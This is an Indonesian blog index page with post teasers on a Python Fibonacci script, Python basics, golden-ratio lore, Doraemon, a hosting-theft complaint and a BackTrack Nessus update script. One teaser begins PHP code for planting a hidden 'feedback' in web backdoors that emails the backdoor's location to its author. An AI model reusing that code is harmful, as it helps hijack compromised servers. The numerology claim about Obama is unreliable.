Deret Fibonacci python

menghitung deret fibonacci menggunakan python

#!/usr/bin/env python
import os, sys
if sys.platform == 'linux-i386' or sys.platform == 'linux2':
hapus = "clear"
if sys.platform == 'win32':
hapus = "cls"
print "deret fibonacci in python"
jumlah = raw_input("masukkan jumlah anggota deret yang diinginkan: ")
a=int(jumlah)
if a == 0:
print "anda salah memasukkan angka!!"
elif a == 1:
print "-----------deret fibonaccinya adalah-------------------"
print "[0]"
print "-------------------------------------------------------"
elif a == 2: Continue reading

Advertisements

step by step tutorial all about Python 5yn_4ck

Apa itu Python ?
Python adalah salah satu bahasa pemrograman tingkat tinggi yang bersifat interpreter, interaktif, object-oriented dan dapat beroperasi di hampir semua platform, seperti keluarga UNIX, Mac, Windows, OS/2, ataupun yang lain. Sebagai bahasa tingkat tinggi, Python termasuk salah satu bahasa pemrograman yang mudah untuk dipelajari karena syntax yang jelas dan elegan, dikombinasikan dengan penggunaan module-module siap pakai dan struktur data tingkat tinggi yang efisien.

Asal Nama Python
Nama Python berasal dari salah satu acara komedi tahun 70-an yang disiarkan oleh BBC. Menurut pembuat bahasa Python, Guido van Rossum (http://www.python.org/~guido/), nama Python dipakai untuk memberikan suatu nama yang unik, pendek, dan sedikit misterius. Oleh karena itu Python sama sekali tidak berhubungan dengan salah satu reptil buas.

Kegunaan Python
Python dapat kita gunakan untuk pemrograman yang memerlukan dinamisme tinggi, waktu pengembangan yang cepat, aplikasi skala besar yang memerlukan orientasi objek, dan juga fleksibilitas yang tinggi. Python bisa digunakan untuk membuat banyak aplikasi, mulai dari aplikasi perkantoran, aplikasi web, simulasi yang memerlukan perhitungan tingkat tinggi,administrasi sistem operasi, dan sebagainya.

Continue reading

Kaitan Deret Fibonacci dengan Angka Tuhan

Angka Tuhan? Mungkin Anda bertanya-tanya tentang “Angka Tuhan”, apaan sih? Sebenarnya itu hanya istilah saya saja untuk menyebut suatu “angka misteri” (baca:sangat menakjubkan) yang banyak ditemukan pada kejadian-kejadian di alam ini. Angka ini sejatinya telah banyak diteliti oleh peneliti luar negeri, mereka umumnya menyebut angka ini adalah “golden ratio” atau “golden number”.

Nah, mungkin sebagian Anda sudah tidak asing lagi dengan 2 istilah yang terakhir. Ya, bagi Anda yang sudah membaca mengenai hal ini pasti Anda mengetahui bahwa angka ini ada kaitannya dengan deret Fibonacci atau Fibonacci sequence.

Tahukah Anda mengapa para peneliti menyebutnya golden number? karena banyak sekali kejadian-kejadian di alam ini yang berkaitan dengan angka tersebut. Bahkan, sebelum Obama terpilih menjadi presiden, ada yang meramalkan bahwa Obama akan menjadi presiden Amerika ke-44 dengan dasar dari analisa deret Fibonacci. Wow? Benarkah?

Continue reading

Ending Komik Doraemon

siapa sih yang ga kenal sama doraemon?tokoh kartun besutan Fujiko F Fujio ini udah dari tahun 1969 jadi sebuah seri komik yang populer di hampir di seluruh negara di dunia. hampir di setiap episodenya kita selalu dibuat penasaran kira2 apalagi ya yang diperbuat sama nobita? alat apalagi ya yang dikeluarin sama doraemon buat ngebantu nobita?
tapi dari dulu sampe sekarang nobita,dkk tetep aja ya umurnya segitu2 aja..hehe..dari gw kecil ampe sekarang dah lulus kuliah si nobita,dkk tetep aja masih SD…

sejarah doraemon dari wikipedia

Sejarah

Pada bulan Desember 1969, manga Doraemon terbit berkesinambungan dalam 6 judul majalah bulanan anak. Majalah-majalah tersebut adalah majalah Yoiko (anak baik), Yochien (taman kanak-kanak), Shogaku Ichinensei (kelas 1 SD), Shogaku Yonnensei (kelas 4 SD), dan sejak 1973 majalah Shogaku Gogensei (kelas 5 SD) dan Shogaku Rokunensei (kelas 6 SD). Cerita yang terkandung dalam majalah-majalah itu berbeda-beda, yang berarti pengarang cerita ini harus menulis lebih dari 6 cerita setiap bulannya. Pada tahun 1979, CoroCoro Comic diluncurkan sebagai majalah Doraemon. Continue reading

POC memanen ratusan backdoor

tadi setelah baca artikel nya om cruzen
http://forum.devilzc0de.org/thread-2239.html
ini hampir mirip dengan apa yang saya lakukan untuk mendapatkan fresh backdoor

bedanya kalo yang diterangkan om cruzen, dia menanam backdoor didalam script orang lain

nah kalo punya ane
ane pasang feedback di dalam backdoor
he2… tau kan siapa aja yang sering pakek bd

pertama kita membutuhkan script untuk feedback nya
yakni script yang memberitahukan lokasi backdoor berada


// untuk menyembunyikan error.
@error_reporting(0);
//subject
$sub="backdoor";
//pengirim email
$headers = "From: k3nz0 \n";
$headers .= "Content-Type: text/plain; charset=iso-8859-1\n";
//untuk menampilkan path dari file url Continue reading

Pencurian Script www.findtoyou.com oleh penyedia hosting www.stopanos.net

Pencurian Script http://www.findtoyou.com oleh penyedia hosting http://www.stopanos.net
By k1n9k0ng
Published: April 29, 2010
Updated: April 29, 2010

Sebelumnya kami menyewa disalah satu server sebagai VPS , kami menyewa disalah satu penyedia hosting http://www.stopanos.net , tapi mungkin dimanfaatkan oleh segelintir staff ataupun admin yang tidak bertanggung jawab mencuri source code dan database , untuk semua agar berhati-hati untuk tidak seperti ini , dan kami meminta pihak http://www.stopanos.net sebagai pihak yang bertanggung jawab atas duplikasi script http://www.findtoyou.com kami.

Berikut hasil link script kami yang diambil , dan kami punya bukti lebih kuat dari semua ini

POC :

779 free
780 free
781 top
782 free
783 top
784 free
785 top
786 ps ax
787 killall nginx
788 /usr/local/nginx/sbin/nginx
789 free
790 ps ax
791 shutdown -r now
792 /usr/local/nginx/sbin/nginx Continue reading

Update backtrack 3

#!/bin/sh
#
# Avoid using root’s TMPDIR
unset TMPDIR

Nessusplugins() {

read -p “Update Nessus Daemon? <y/n> ”
if [ “$REPLY” = “y” ];then
echo ———————————————
echo Nessus Plugins
echo
KIND=”Nessus Server”
echo -n $”Shutting down $KIND: ”
test -f /opt/nessus/var/nessus/nessus-service.pid && kill `cat /opt/nessus/var/nessus/nessus-service.pid`
RETVAL=$?
sleep 4
if [ “$RETVAL” == “0” ]; then
rm -f /var/lock/subsys/nessusd
echo services stopped successfully
else
echo services were not running…
fi
echo
echo -n “Updating $KIND plugins: ”
/opt/nessus/sbin/nessus-update-plugins
echo $KIND plugins updated successfully
echo -n $”Starting $KIND services: ”
/opt/nessus/sbin/nessus-service -D -a 127.0.0.1 –ipv4-only
echo $KIND services started… Continue reading